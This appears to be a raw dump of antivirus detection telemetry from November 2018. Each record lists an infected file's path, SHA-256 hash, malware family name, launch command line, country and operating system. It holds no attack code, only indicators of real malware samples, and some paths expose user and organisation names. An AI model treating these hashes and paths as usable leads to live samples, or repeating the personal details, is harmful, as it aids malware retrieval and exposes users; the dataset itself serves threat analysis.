  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-02-00-43-28.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-26T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-01T18:53:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='borong.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\Borong\\Borong.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:21:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oldfunk.exe', filepath='D:\\OLDFUNK.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='26aca70de1e5fc8ef792fe27753596c6450cfa26c91a16ce3cd0aaded42f91d1', metadata=Row(cmdline='rtp', country='GH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T14:35:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='perpanjangan pkb.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA LAPORAN AUDIT\\PERPANJANGAN PKB\\PERPANJANGAN PKB.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:03:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:52:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-15-13-53.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-17T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T10:33:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-06-56-59.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T01:06:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wdsw.exe', filepath='d:\\bereau المكتب 2018\\hicham\\wlan_wiz\\fra\\wdsw.exe', filesize=1024000, name='W32/Sality.AT.#M1.#R1'), hash='0cd5ca1c57f6e50bc116bcce1d517d464ed2df6fc4c11ad385b836e0bedaacdf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:17:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155458-b74b21e4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155458-B74B21E4', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07ddd54fce2f21ecca5e60754450ce540abd1a7b0609f10a00fb08874cf5f366', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Master\\SalityKiller.exe', parentsize=171344, timestamp='2018-11-01T03:00:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='\\\\?\\E:\\Programing\\Programming Software\\Toad for Oracle 9.7.0.51 Commercial\\keygen.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='3032e0808e60987d34c3ad1b2e9c0bc0312be1b080c6b1868f63f7b1271b16b5', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:02:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155506-399aa4d6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c591ee81\\AVSCAN-20181101-155204-205028ED\\AVSCAN-20181101-155506-399AA4D6', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:13:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T19:47:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160137-fa7aebce', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160137-FA7AEBCE', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:01:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234234-1b296296', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-234234-1B296296', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:42:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='udvderase.exe', filepath='C:\\Program Files\\Corel\\Corel DVD MovieFactory Lenovo Edition\\DVD MovieFactory\\uDVDErase.exe', filesize=512000, name='W32/Sality.AW.#M1.#R1'), hash='b5679e6a2c88554e624bcf413937cfafcb3030525fb7965d0c8370f5c5a70e1a', metadata=Row(cmdline='invagent.dll,RunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:07:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='6b937ff378a8e871cc9ff12d5a7079b3ffc4e41234bac993f88fe6b49fbc37f1', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2501368, timestamp='2018-11-01T09:51:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B1669DD8AB9595DF192AF2E61A14416AB08B67250FEBBFC35CF35A356C2A49E2', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b1669dd8ab9595df192af2e61a14416ab08b67250febbfc35cf35a356c2a49e2', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3d frog frenzy.exe', filepath='\\?\\J:\\العاب2\\الضفدعة\\3D Frog Frenzy.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='88cd48a37cbad75afcc1b95f9645564d6d8a7f62c23d2cbf35d29816079253c3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:10:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-01T03:57:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='d01524025eac0e29f9ecf8f074e43451058a94c76c4385250228504e28466058', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-18\\D01524025EAC0E29F9ECF8F074E43451058A94C76C4385250228504E28466058', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d01524025eac0e29f9ecf8f074e43451058a94c76c4385250228504e28466058', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:22:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='9pwoex5xi.exe', filepath='C:\\PROGRA~1\\9PWOEX5XI3\\9PWOEX5XI.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='733e354c150b4149737ae67afd29dc8e971759219779881f1f0375c6118fb5b9', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T20:23:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121841-91c67db8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_4362a8a6\\AVSCAN-20181101-121829-8FFA0972\\AVSCAN-20181101-121841-91C67DB8', filesize=128000, name='TR/Crypt.ULPM.Gen.#M300.#R4257'), hash='e044b8c755f55c6834f5c9bf53e931f5f40b13b67adf1eb7ce5312935a1006f2', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:11:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-141442-ffdfc105', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_103c7217\\AVSCAN-20181101-141146-DA744C4C\\AVSCAN-20181101-141442-FFDFC105', filesize=376000, name='PUA/MyWebSearch.ME.1.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T13:14:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fotec', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fotec', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a25a376c309db55fbf6556610e23f3b1b3692e233d3b7d2387b8f5e8366965dc', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:07:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{07D3CB25-7F85-41AB-823A-1A37E2FE5C1D}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='a56c31d4c25d9f8878b1a7162f9fd1f252eb7c75f326c8f3a1f749970dcfa811', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\NHML-1.8.1.6\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-01T04:16:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beetle bug 3.exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\Beetle Bug 3.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='d92f05c94c4537795b64edf2b4cf730935941e9b53812ba1c56aea09eb1a198f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8f460caf3e9fda628a0d42563b5f353d35e8369e360f7c906d8e425a7e3218db', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\8F460CAF3E9FDA628A0D42563B5F353D35E8369E360F7C906D8E425A7E3218DB', filesize=2240000, name='HEUR/AGEN.1027095.#M1.#R1'), hash='8f460caf3e9fda628a0d42563b5f353d35e8369e360f7c906d8e425a7e3218db', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:56:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='afa73ab642d78f050ff87bfc3b01bf860c14fd2c937c63a4f1a4421d419f04dc', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T21:24:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='อจท. แผน 3-3 คณิตฯ ม.3 เล่ม 1.doc', filepath='\\Device\\DSENUM#5b5507cb\\Users\\TRV3-03\\Desktop\\New folder\\03.แผนฯ คณิตศาสตร์ ม.3 เล่ม 1\\หน่วย 3 คณิตฯ ม.3 ล.1\\อจท. แผน 3-3 คณิตฯ ม.3 เล่ม 1.doc', filesize=1344000, name='EXP/CVE-2006-4534.#M1.#R1'), hash='e5364f0c0dc446ba810a5587c1f8cca5b3db43dd964f0b8bf1e332a4992af680', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:10:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='basireps.exe', filepath='\\\\?\\C:\\FullProf_Suite\\basireps.exe', filesize=1344000, name='HEUR/APC.#M1.#R1'), hash='e1eac262ab8ceb62f2461b4f450c4f579266690fb435b3826e259cfe48358f43', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T07:20:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='keygen.exe', filepath='D:\\4. Multimedia\\3. Audio Editors & Recorders\\5. Cockos REAPER 4.54 Final\\Keygen.and.Patch-BRD\\Keygen.exe', filesize=64000, name='TR/Rogue.7547256.#M1.#R1'), hash='d8f3b8709ebc205cb05e8cb0bfb9c041b8eebd0e2825b6b71d1d265f77117514', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='IQ', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T20:32:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-112109-47b03e13', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-112109-47B03E13', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:20:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105801-989f0d62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-105801-989F0D62', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:57:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110546-d330f531', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110546-D330F531', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsdD21E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:17:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:56:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Desktop\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T21:20:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\行銷管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='02da631777a3c2ca2d33853a06269f788e1d027e6de8e640798721363d6ffd6c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:dZLJlmOScUes48KI.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T00:57:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002239-3987bff9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002239-3987BFF9', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:20:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.848\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.848\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T20:04:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113534-da3cc048', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a85bc91\\AVSCAN-20181101-103701-F094D29C\\AVSCAN-20181101-113534-DA3CC048', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T04:35:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0007115.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{956F9782-0BB2-43F5-A11C-7A8F8AD2E548}\\RP5\\A0007115.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='84e3d420777971a9f11a639075cd1bf3ce7c76f1f085b69ead06440021d19cd3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:26:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T10:12:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='upgradedownload.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Desktop\\Exmobile Software\\E9\\UPGRADEDOWNLOAD_R2.9.9009\\Bin\\UpgradeDownload.exe', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='7f3fcb520e4b13a3be79c80bb864f5daa7d9c948baadaf0e87afbcb3bc4b2a49', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Temp1_Setup (1).zip\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:07:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dcbafedcbaafedcbafedcbaafedcbafedd.dcbafedcbaafedcbafedcbaafedcbafedd', filepath='\\?\\G:\\dcbafedcbaafedcbafedcbaafedcbafedd.dcbafedcbaafedcbafedcbaafedcbafedd', filesize=7192000, name='WORM/Lodbak.Gen4.#M300.#R300496'), hash='0e47ceb81086cbc303d032a481c9b6bbc187cc54043279f54b0e0900254040f0', metadata=Row(cmdline=None, country='YE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:33:15Z'), dt=datetime.date(2018, 11, 1)),
